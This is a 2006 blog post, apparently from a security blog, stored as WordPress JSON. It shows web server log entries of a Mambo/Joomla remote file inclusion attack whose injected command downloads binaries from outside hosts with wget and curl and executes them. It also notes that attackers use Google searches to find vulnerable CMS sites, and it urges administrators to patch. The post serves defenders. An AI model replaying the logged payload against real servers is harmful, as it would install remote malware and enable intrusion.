{"id":44,"date":"2006-05-05T11:06:15","date_gmt":"2006-05-05T15:06:15","guid":{"rendered":"http:\/\/blogs.law.harvard.edu\/zeroday\/2006\/05\/05\/interesting-attacks-on-my-web-server\/"},"modified":"2006-05-08T09:52:51","modified_gmt":"2006-05-08T13:52:51","slug":"interesting-attacks-on-my-web-server","status":"publish","type":"post","link":"https:\/\/archive.blogs.harvard.edu\/zeroday\/2006\/05\/05\/interesting-attacks-on-my-web-server\/","title":{"rendered":"Interesting attacks on my web server"},"content":{"rendered":"

<\/a><\/p>\n

Still think that firewall is enough to protect your web server? Port 80 to the rescue!
\nThrough a combination of curl, wget and various shell commands this “URL” is a sneaky little rootkit. I haven’t had time to download the executables and rip them apart but something tells me that after all is said and done… you end up on some IRC server in Brazil. Call it a hunch.<\/p>\n

130.227.55.243 – – [25\/Apr\/2006:10:08:10 -0700] “GET \/index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http:\/\/210.3.4.193\/cmd.txt?&cmd=cd%20\/tmp;wget%2070.168.74.193\/strange;chmod%20744%20strange;.\/strange;cd%20\/var\/tmp;curl%20-o%20arts%20http:\/\/207.90.211.54\/arts;chmod%20744%20arts;.\/arts;echo%20YYY;echo| HTTP\/1.1” 404 1044 “-” “Mozilla\/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)”130.227.55.243 – – [25\/Apr\/2006:10:08:11 -0700] “GET \/index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http:\/\/210.3.4.193\/cmd.txt?&cmd=cd%20\/tmp;wget%2070.168.74.193\/strange;chmod%20744%20strange;.\/strange;cd%20\/var\/tmp;curl%20-o%20arts%20http:\/\/207.90.211.54\/arts;chmod%20744%20arts;.\/arts;echo%20YYY;echo| HTTP\/1.1” 404 1044 “-” “Mozilla\/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)”130.227.55.243 – – [25\/Apr\/2006:10:08:12 -0700] “GET \/mambo\/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http:\/\/210.3.4.193\/cmd.txt?&cmd=cd%20\/tmp;wget%2070.168.74.193\/strange;chmod%20744%20strange;.\/strange;cd%20\/var\/tmp;curl%20-o%20arts%20http:\/\/207.90.211.54\/arts;chmod%20744%20arts;.\/arts;echo%20YYY;echo| HTTP\/1.1” 404 1044 “-” “Mozilla\/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)”<\/p>\n

Seclists.org also noticed this traffic back in March.
\nAll of them, as we can see, are exploitation attempts to known bugged
\npages (like the newest Mambo bug, the old XMLRPC problem with old
\nversions of Drupal, etc). I guess that they are getting a list of
\ndomain names and trying them out with those vulns, and I believe that
\nthey may already have some thousands of vuln machines in their hands.
\nSuch attacks might been enhanced by using Google to guess which
\ndomains are using which CMS… for example, looking on Google for “A
\npassword and instructions will be sent to this e-mail address, so make
\nsure it is accurate.” will return a bunch of Drupal websites (88,500
\naccording to Google, even though we can see just the first 1000 ones). <\/p>\n

This is just an advise for all admins that use those CMS, to keep, as
\nalways, your CMS updated (almost every two weeks there are new vulns
\ndisclosed), and also, check if you already got caught by that, if
\nyou’re running old software. <\/p>\n

<\/a><\/p>\n

The most interesting comment here is the use of Google to hone the attacks. There is even a book on the market that talks about hacking with google. One of the more novel methods was extracting credit card numbers. Before anyone wonders whether Google gets sued <\/a> over the random crimes committed by others using Google look no further.<\/p>\n

More details found on a forum regarding the make up of this root kit:
\n<\/p>\n

\r\n another botnet irc client:\r\n http:\/\/210.3.4.193\/cmd.txt  \r\n<\/pre>\n
<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"
Still think that firewall is enough to protect your web server? Port 80 to the rescue! Through a combination of curl, wget and various shell commands this “URL” is a sneaky little rootkit. I haven’t had time to download the executables and rip them apart but something tells me that after all is said and […]<\/p>\n","protected":false},"author":214,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[275],"tags":[],"class_list":["post-44","post","type-post","status-publish","format-standard","hentry","category-vulnerabilities"],"jetpack_featured_media_url":"","_links":{"self":[{"href":"https:\/\/archive.blogs.harvard.edu\/zeroday\/wp-json\/wp\/v2\/posts\/44","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/archive.blogs.harvard.edu\/zeroday\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/archive.blogs.harvard.edu\/zeroday\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/archive.blogs.harvard.edu\/zeroday\/wp-json\/wp\/v2\/users\/214"}],"replies":[{"embeddable":true,"href":"https:\/\/archive.blogs.harvard.edu\/zeroday\/wp-json\/wp\/v2\/comments?post=44"}],"version-history":[{"count":0,"href":"https:\/\/archive.blogs.harvard.edu\/zeroday\/wp-json\/wp\/v2\/posts\/44\/revisions"}],"wp:attachment":[{"href":"https:\/\/archive.blogs.harvard.edu\/zeroday\/wp-json\/wp\/v2\/media?parent=44"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/archive.blogs.harvard.edu\/zeroday\/wp-json\/wp\/v2\/categories?post=44"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/archive.blogs.harvard.edu\/zeroday\/wp-json\/wp\/v2\/tags?post=44"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}